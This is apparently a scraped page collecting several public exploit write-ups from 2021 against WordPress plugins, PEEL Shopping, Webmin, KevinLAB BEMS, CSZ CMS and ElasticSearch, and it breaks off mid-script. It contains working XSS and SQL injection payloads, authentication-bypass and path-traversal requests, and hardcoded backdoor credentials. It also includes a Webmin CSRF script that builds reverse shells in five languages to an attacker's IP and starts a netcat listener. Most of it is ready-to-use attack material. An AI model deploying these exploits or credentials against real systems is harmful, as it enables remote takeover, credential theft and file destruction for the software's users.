HireHackking

# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) # Date: 19/07/2021 # Exploit Author: Aakash Choudhary # Software Link: https://wordpress.org/plugins/kn-fix-your/ # Version: 1.0.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate KN Fix Your Title 3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>

# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection # Date: 2021-07-10 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.peel.fr # Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download # Version: prior to 9.4.0 # Tested on: Windows 10, XAMPP # Reference: https://github.com/advisto/peel-shopping/issues/3 # CVE: CVE-2021-37593 ################ # Description # ################ # PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. ##################### # PoC of detection # ##################### 1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel". PoC #1) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) Request: The response duration = 418 bytes | 7,719 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE. PoC #2) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) Request: The response duration = 418 bytes | 5,112 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly. PoC #3) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) Request: The response duration = 418 bytes | 10,140 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- # For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3. # The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1 # The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]

# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS) # Date: 18/07/2021 # Exploit Author: Vikas Srivastava # Vendor Homepage: # Software Link: https://wordpress.org/plugins/mimetic-books/ # Version: 0.2.13 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Mimetic Books 3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>

# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) # Date: 24/04/2021 # Exploit Author: Mesh3l_911 & Z0ldyck # Vendor Homepage: https://www.webmin.com # Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 # Version: Webmin 1.973 # Tested on: All versions <= 1.973 # CVE: CVE-2021-31761 # Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to # get a Remote Command Execution (RCE) through the Webmin's running process # feature import time, subprocess,random,urllib.parse print('''\033[1;37m __ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/ \033[1;m''') for i in range(101): print( "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( i), "\033[1;36m%\033[1;m", end="") time.sleep(0.02) print("\n\n") target = input( "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") if target.endswith('/'): target = target + 'tunnel/link.cgi/' else: target = target + '/tunnel/link.cgi/' ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m") ReverseShell = input \ ('''\033[1;37m \n 1- Bash Reverse Shell \n 2- PHP Reverse Shell \n 3- Python Reverse Shell \n 4- Perl Reverse Shell \n 5- Ruby Reverse Shell \n \033[1;m \033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''') file_name = random.randrange(1000) if ReverseShell == '1': ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' elif ReverseShell == '2': ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' elif ReverseShell == '3': ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' elif ReverseShell == '4': ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' elif ReverseShell == '5': ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' else: print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") def CSRF_Generator(): Payload = urllib.parse.quote(''' <html> <head> <meta name="referrer" content="never"> </head> <body> <script>history.pushState('', '', '/')</script> <form action="/proc/run.cgi" method="POST"> <input type="hidden" name="cmd" value="''' + ReverseShell + '''" /> <input type="hidden" name="mode" value="0" /> <input type="hidden" name="user" value="root" /> <input type="hidden" name="input" value="" /> <input type="hidden" name="undefined" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ''') print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") print(target+Payload) def Netcat_listener(): print() subprocess.run(["nc", "-nlvp "+port+""]) def main(): CSRF_Generator() Netcat_listener() if __name__ == '__main__': main()

# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5654 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php 05.07.2021 -- Backdoor accounts from the DB: ------------------------------ Username: kevinlab (permission=1) Password: kevin003 Username: developer1 (permission=6) Password: 1234

# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5656 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php 05.07.2021 -- GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ... ...

# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion # Date: 2021-07-20 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.cszcms.com # Software Link: https://sourceforge.net/projects/cszcms/files/latest/download # Version: 1.2.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/cskaza/cszcms/issues/32 ################ # Description # ################ # CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php Steps to Reproduce: 1. Login as admin 2. Goto Plugin Manager > Article > edit any article 3. Upload any image as "Main Picture" and "File Upload" and click save button 4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" 1) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root Request: ======== POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 Host: localhost Content-Length: 2048 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 Connection: close ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="title" article beta ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="keyword" testing file ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="short_desc" deletion ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="cat_id" 2 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="content" <div class="row"> <div class="col-md-12"> <p>test for file deletion</p> </div> </div> <p><br><br></p> ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file" ../../../conf_secret_file.php ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainPicture" 2021/1626802955_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file2" ../../../config_backup.txt ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload2"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainFile" 2021/1626802956_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="lang_iso" en ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_limit" 5 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_sort" reverse_time ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundaryAMyATk1BfQaBOHvY-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php Steps to Reproduce: 1. Login as admin 2. Goto General Menu > Site Setting 3. Upload any image as "Site Logo" and "Image of og metatag" and click save button 4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image" 2) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root Request: ======== POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1 Host: localhost Content-Length: 5163 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu Connection: close ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTitle" CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="title_setting" 2 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteFooter" &copy; %Y% CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteKeyword" CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTheme" cszdefault ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLang" english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_metatag" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_js" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="pagecache_time" 0 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="assets_static_domain" demo@cszcms.com ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="html_optimize_disable" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_file" ../../conf_secret_file.php ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLogo" 2021/1626800829_logo.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_og_image" ../../config_backup.txt ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="og_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ogImage" 2021/1626800829_og.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteEmail" demo@cszcms.com ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_protocal" mail ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_host" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_user" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_pass" 123456 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_port" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="sendmail_path" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_logs" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_sitekey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_secretkey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_client_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_view_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gsearch_cxid" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_key" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lat" -28.621975 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lng" 150.689082 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="fbapp_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="facebook_page_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="adobe_cc_apikey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_bg" #645862 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_fg" #ffffff ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_link" #f1d600 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_msg" This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_linkmsg" Privacy Policy and terms. ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_moreinfo" https://www.cszcms.com/LICENSE.md ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_txtalign" left ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_close" Got it! ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundary8cAl5KcKGP0D3Qi2-- --- # For more explaination, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32 # The affected version is 1.2.9.

# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5655 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php 05.07.2021 -- PoC POST data payload (extract): -------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] PoC POST data payload (authbypass): ----------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS) # Date: 23/07/2021 # Exploit Author: Vikas Srivastava # Software Link: https://wordpress.org/plugins/simple-post/ # Version: 1.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Simple Post 3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field. 4. Click Update Options. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>

# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure # Date: 21/07/2021 # Exploit Author: r0ny # Vendor Homepage: https://www.elastic.co/ # Software Link: https://github.com/elastic/elasticsearch # Version: 7.10.0 to 7.13.3 # Tested on: Kali Linux # CVE : CVE-2021-22145 #/usr/bin/python3 from argparse import ArgumentParser import requests from packaging import version import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print("\n################################################################################################") print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######") print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######") print("################################################################################################\n") parser = ArgumentParser() parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service") parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="") parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="") args = parser.parse_args() if not (args.url): parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"') #Prepare authentication header authorization_header = "" if(args.api_key or args.basic): authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic #Check elasticsearch version r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False) try: es_version = json.loads(r.content)["version"]["number"] except: print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n") print("# Server response: " + str(r.content)) exit() if version.parse(es_version) < version.parse("7.10.0") or 